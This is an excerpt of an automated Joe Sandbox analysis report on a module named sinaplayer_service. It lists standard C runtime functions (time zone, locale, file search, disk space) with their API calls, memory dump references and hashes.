                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D43C6
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D43D1
                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 6D0D43E1
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0D4400
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D4523
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0D453A
                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 6D0D4549
                                                                                                                                                                                                      • Part of subcall function 6D095F93: _get_daylight.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D096067
                                                                                                                                                                                                      • Part of subcall function 6D095F93: _get_dstbias.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D096079
                                                                                                                                                                                                      • Part of subcall function 6D095F93: _get_timezone.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D09608B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Time$System$File_wcsicmp$FindLocalSpecific_errno$Close__doserrno$DriveErrorFirstLastType__dosmaperr_get_daylight_get_dstbias_get_timezone_getdrive_invalid_parameter_noinfo_wcspbrkfreetowlowerwcsrchr
                                                                                                                                                                                                    • String ID: ./\
                                                                                                                                                                                                    • API String ID: 4076242085-3176372042
                                                                                                                                                                                                    • Opcode ID: dc3a21a7c30a111051fde385b2f1785753128e6d79ec8075a0b9a08eebbcaf12
                                                                                                                                                                                                    • Instruction ID: daa1ea2f65b21a1adbc64c6e4d547d6124e4d682b81d554d6b8458d269e7f6da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc3a21a7c30a111051fde385b2f1785753128e6d79ec8075a0b9a08eebbcaf12
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DAC1C3B18086299FEB208F65CC48BBAB7FCBF09315F10469AF659D6191E734C980DF64
                                                                                                                                                                                                    Function 6D0A8D59 Relevance: 40.8, APIs: 27, Instructions: 275stringtimeCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _lock.MSVCR120(00000007,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8D7E
                                                                                                                                                                                                      • Part of subcall function 6D08EDD7: EnterCriticalSection.KERNEL32(?,?,6D11E497,0000000E,6D11E4F8,0000000C,6D08EC8C), ref: 6D08EDF3
                                                                                                                                                                                                    • __tzname.MSVCR120(6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8D87
                                                                                                                                                                                                    • _get_timezone.MSVCR120(0000003B,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8D93
                                                                                                                                                                                                    • _get_daylight.MSVCR120(?,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8DA5
                                                                                                                                                                                                    • _get_dstbias.MSVCR120(?,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8DB7
                                                                                                                                                                                                    • ___lc_codepage_func.MSVCR120(6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8DC5
                                                                                                                                                                                                      • Part of subcall function 6D097060: strlen.MSVCR120(00000000,00000064,00000000,?,6D0A8DEB,6D0A8F1C,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000), ref: 6D09707C
                                                                                                                                                                                                      • Part of subcall function 6D097060: strlen.MSVCR120(00000000,00000064,00000000,?,6D0A8DEB,6D0A8F1C,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000), ref: 6D09708B
                                                                                                                                                                                                      • Part of subcall function 6D097060: _mbsnbicoll.MSVCR120(00000000,00000000,00000000,00000064,00000000,?,6D0A8DEB,6D0A8F1C,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190), ref: 6D0970A7
                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(6D160C00,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0A8E0B
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,6D160C04,000000FF,6D0D4437,0000003F,00000000,?), ref: 6D0A8E84
                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,6D160C58,000000FF,1CC48320,0000003F,00000000,?), ref: 6D0A8EBC
                                                                                                                                                                                                    • __timezone.MSVCR120 ref: 6D0A8EE3
                                                                                                                                                                                                    • __daylight.MSVCR120 ref: 6D0A8EED
                                                                                                                                                                                                    • __dstbias.MSVCR120 ref: 6D0A8EF7
                                                                                                                                                                                                    • strcmp.MSVCR120(00000000,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66A5
                                                                                                                                                                                                    • free.MSVCR120(00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66BA
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66C1
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000001,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D66C8
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?,?), ref: 6D0D6709
                                                                                                                                                                                                    • free.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000000,6D0A8F20,00000030,6D0A915C,6D095B70,00000008,6D096063,00000190,00000190,00000000,?), ref: 6D0D670F
                                                                                                                                                                                                    • strncpy_s.MSVCR120(6D0D4437,00000040,00000000,00000003), ref: 6D0D672A
                                                                                                                                                                                                    • atol.MSVCR120(-00000003), ref: 6D0D6747
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: strlen$ByteCharMultiWidefree$CriticalEnterInformationSectionTimeZone___lc_codepage_func__daylight__dstbias__timezone__tzname_get_daylight_get_dstbias_get_timezone_invoke_watson_lock_malloc_crt_mbsnbicollatolstrcmpstrncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 427740661-0
                                                                                                                                                                                                    • Opcode ID: d2a1984b5f1a5e849a11ef40e0c46e8ee44f541ed75ef044ab6e4adf970c08f3
                                                                                                                                                                                                    • Instruction ID: 2678a9a89e63f04cfd7bbb3081e73fcdbb98c3061fc1280e8104cf088490c58e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2a1984b5f1a5e849a11ef40e0c46e8ee44f541ed75ef044ab6e4adf970c08f3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50A1AE70D0838A9FFB05CFA9D940BBDBBF8BF0A314F55415AE120AB291D7758841CB64
                                                                                                                                                                                                    Function 6D0FE060 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 159fileCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?), ref: 6D0FE082
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?), ref: 6D0FE08D
                                                                                                                                                                                                      • Part of subcall function 6D124670: _invalid_parameter.MSVCR120(00000000,00000000,00000000,00000000,00000000,6D0FB412,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D124677
                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,?,00000000,?), ref: 6D0FE0B0
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FE0BA
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FE0D6
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FE0E3
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FE0F0
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FE115
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,6D0FD935,?), ref: 6D0FD1CC
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?,?,?,?,6D0FD935,?), ref: 6D0FD1E0
                                                                                                                                                                                                      • Part of subcall function 6D0FD1A9: ___loctotime32_t.LIBCMT ref: 6D0FD20A
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FE124
                                                                                                                                                                                                    • ___time64_t_from_ft.LIBCMT ref: 6D0FE133
                                                                                                                                                                                                    • wcscpy_s.MSVCR120(?,00000104,?,?,?,?), ref: 6D0FE164
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0FE179
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE18A
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE195
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE1A8
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE1B3
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,00000010,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6D0FE1C2
                                                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,00000008,0000000C,00000004,00000000), ref: 6D0FE1F3
                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 6D0FE1FE
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0FE206
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$Time$___time64_t_from_ft_invalid_parameter_noinfo$ErrorFileLastSystem$DiskFindFreeLocalNextSpaceSpecific___loctotime32_t_invalid_parameter_invoke_watsonmemsetwcscpy_s
                                                                                                                                                                                                    • String ID: :\
                                                                                                                                                                                                    • API String ID: 2675026314-112054617
                                                                                                                                                                                                    • Opcode ID: b98c9624b59e97c3c2fbdedae5b7c82b33c4348f303d186d9a2064696e86e580
                                                                                                                                                                                                    • Instruction ID: cae70025f7276b990091c2dd9141c25f657067adb3b8955402a07b04fdc67eea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b98c9624b59e97c3c2fbdedae5b7c82b33c4348f303d186d9a2064696e86e580
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA51E6726042099BFB219FB4DC40BAEB7F8EF45314F11856AEE15CB280EB74D5818B61
                                                                                                                                                                                                    Function 6D0A8579 Relevance: 27.2, APIs: 18, Instructions: 209COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,?,?,00000040), ref: 6D0A84ED
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(0000009C,?), ref: 6D0A8502
                                                                                                                                                                                                    • _wcsnicmp.MSVCR120(0000009C,?,?), ref: 6D0A8529
                                                                                                                                                                                                    • _TestDefaultCountry.LIBCMT ref: 6D0A8544
                                                                                                                                                                                                    • wcslen.MSVCR120(?), ref: 6D0A8557
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(000002EC,00000055,?,00000001,?), ref: 6D0A8568
                                                                                                                                                                                                    • _getptd.MSVCR120 ref: 6D0A8597
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,?,?,00000040), ref: 6D0A85C0
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(?,?), ref: 6D0A85DB
                                                                                                                                                                                                      • Part of subcall function 6D08F840: _wcsicmp_l.MSVCR120(?,?,00000000), ref: 6D08F858
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,?,?,00000080), ref: 6D0A861A
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(0000009C,?), ref: 6D0A8633
                                                                                                                                                                                                    • wcslen.MSVCR120(?), ref: 6D0E0496
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(000002EC,00000055,?,00000001,?), ref: 6D0E04A7
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0E04FF
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,2000000B,?,00000002,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?), ref: 6D0E0519
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale__crt$_wcsicmp$wcslenwcsncpy_s$CountryDefaultTest_getptd_invoke_watson_wcsicmp_l_wcsnicmp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2789717988-0
                                                                                                                                                                                                    • Opcode ID: 9aa5c89b637387dd49ea29af3f890408ec6f485ad170bdccdea43dc6cfffbac8
                                                                                                                                                                                                    • Instruction ID: 0b1e6fbd1666531865f6c405e0b543113469fec2fa0e49911cf707b6ed78da2d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aa5c89b637387dd49ea29af3f890408ec6f485ad170bdccdea43dc6cfffbac8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD5104B25081569BFF048A75CD81BBA37ECFF01354F5880A9EE18DB086EF75CA408B64
                                                                                                                                                                                                    Function 6D0A4FC6 Relevance: 24.4, APIs: 16, Instructions: 443COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D0A5D05: __EH_prolog3.LIBCMT ref: 6D0A5D0C
                                                                                                                                                                                                      • Part of subcall function 6D0A5D05: ??2@YAPAXI@Z.MSVCR120(00000090,0000000C,6D0A500E,E18D5491,?,00000180,?), ref: 6D0A5D35
                                                                                                                                                                                                    • ?GetProcessorNodeCount@Concurrency@@YAIXZ.MSVCR120(E18D5491,?,00000180,?), ref: 6D0A5027
                                                                                                                                                                                                      • Part of subcall function 6D0A44E0: __EH_prolog3.LIBCMT ref: 6D0A44E7
                                                                                                                                                                                                      • Part of subcall function 6D0A44FF: GetNumaHighestNodeNumber.KERNEL32(?,?,6D0A5034,E18D5491,?,00000180,?), ref: 6D0A4509
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,E18D5491,?,00000180,?), ref: 6D0A5059
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A50A3
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0A50BB
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?), ref: 6D0A50D1
                                                                                                                                                                                                    • memset.MSVCR120(?,00000000,?,?,00000180,?), ref: 6D0A50E4
                                                                                                                                                                                                    • Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 6D0A5160
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(000000C0), ref: 6D0A5250
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000088,?,00000000,00000000,?,?,00000000,000000C0,000000C0), ref: 6D0A52EB
                                                                                                                                                                                                      • Part of subcall function 6D0A4F63: ??2@YAPAXI@Z.MSVCR120(0000000C,?,00000000,00000000,00000000,00000000,?,6D0A53A3,?,?,?,?,?,?,?,00000000), ref: 6D0A4F88
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,00000000,00000000,?,?,00000000,000000C0,000000C0), ref: 6D0A53E5
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000180,?), ref: 6D0A542F
                                                                                                                                                                                                    • __crtCreateSemaphoreExW.MSVCR120(00000000,00000000,7FFFFFFF,00000000,00000000,001F0003,?,?,?,?,00000180,?), ref: 6D0A54A1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@$H_prolog3NodeQuickmemset$Concurrency::details::Concurrency@@Count@CreateHighestNumaNumberProcessorSemaphoreSet::__crtfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1225761749-0
                                                                                                                                                                                                    • Opcode ID: cabe7179afc7d1866c3961fe8b5c0283cfec1a94d47bf409d307bacd7a65682f
                                                                                                                                                                                                    • Instruction ID: 30dac2f3efe9f81f00761300235a19f5d981746abca943d672959648f263f81a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: cabe7179afc7d1866c3961fe8b5c0283cfec1a94d47bf409d307bacd7a65682f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 69028D75608741AFE714CF68C484B6ABBE4FF88314F554A2EF99ACB251DB70E804CB91
                                                                                                                                                                                                    Function 6D0A1BFC Relevance: 22.7, APIs: 15, Instructions: 214stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00001004,?,00000002,?,?,00000000), ref: 6D0A19EA
                                                                                                                                                                                                    • free.MSVCR120(00006A69), ref: 6D0A1A0D
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D0A1BBB
                                                                                                                                                                                                    • strncpy_s.MSVCR120(00000000,?,00000000,?), ref: 6D0A1BDB
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,00000000), ref: 6D0A1C46
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000000,00000002,?,?,?,00000000), ref: 6D0A1C5B
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(?,00001004,00000000,00000000,?,?,?,00000000), ref: 6D0A1C77
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0DF249
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: InfoLocale__crt$_calloc_crtfree$strncpy_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2184820072-0
                                                                                                                                                                                                    • Opcode ID: d6bc2790f58edea462f1f4ad43f2a07c6d2a57a19e57a836cfdfbda61abefe07
                                                                                                                                                                                                    • Instruction ID: bf2fcbabf168c97e3e8cee558c8c29a036c2a7884e5b0d599d12ca7316c436eb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d6bc2790f58edea462f1f4ad43f2a07c6d2a57a19e57a836cfdfbda61abefe07
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6161D3759082179FFF218FA4DC41BAEBBB9BF05310F458196E908E7142EB31C950CB61
                                                                                                                                                                                                    Function 6D0A8036 Relevance: 19.7, APIs: 13, Instructions: 175COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _getptd.MSVCR120(?,00000000,00000055,00000000,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A803D
                                                                                                                                                                                                      • Part of subcall function 6D0A83EE: __crtGetUserDefaultLocaleName.MSVCR120(?,00000055,0000009C), ref: 6D0A8415
                                                                                                                                                                                                      • Part of subcall function 6D0A83EE: wcslen.MSVCR120(?,0000009C), ref: 6D0A8428
                                                                                                                                                                                                      • Part of subcall function 6D0A83EE: wcsncpy_s.MSVCR120(?,00000055,?,00000001,?,0000009C), ref: 6D0A843F
                                                                                                                                                                                                      • Part of subcall function 6D0A7FE9: wcscmp.MSVCR120(?,ACP,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A8008
                                                                                                                                                                                                      • Part of subcall function 6D0A7FE9: wcscmp.MSVCR120(?,OCP,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A801D
                                                                                                                                                                                                      • Part of subcall function 6D0A7FE9: _wtol.MSVCR120(?,0000009C,?,6D0A809C,?,0000009C,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?), ref: 6D0A802D
                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,00000000,00000055,00000000,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A80C4
                                                                                                                                                                                                    • wcslen.MSVCR120(?,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A80F4
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(6D0A82F9,00000055,?,00000001,?,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A8101
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(6D0A82F9,00001001,6D0A81D9,00000040,?,6D0A81D9,?,?,?,?,00000000,00000000,00000000), ref: 6D0A811A
                                                                                                                                                                                                    • __crtGetLocaleInfoEx.MSVCR120(6D0A82F9,00001002,6D0A8259,00000040,?,?,?,?,?,6D0A81D9,?,?,?,?,00000000,00000000), ref: 6D0A813F
                                                                                                                                                                                                    • wcschr.MSVCR120(6D0A8259,0000005F,?,?,?,?,?,?,?,?,?,6D0A81D9,?,?,?), ref: 6D0A8152
                                                                                                                                                                                                    • wcschr.MSVCR120(6D0A8259,0000002E,?,?,?,?,?,?,?,?,?,6D0A81D9,?,?,?), ref: 6D0A8164
                                                                                                                                                                                                    • _itow_s.MSVCR120(00000000,6D0A82D9,00000010,0000000A), ref: 6D0A817F
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
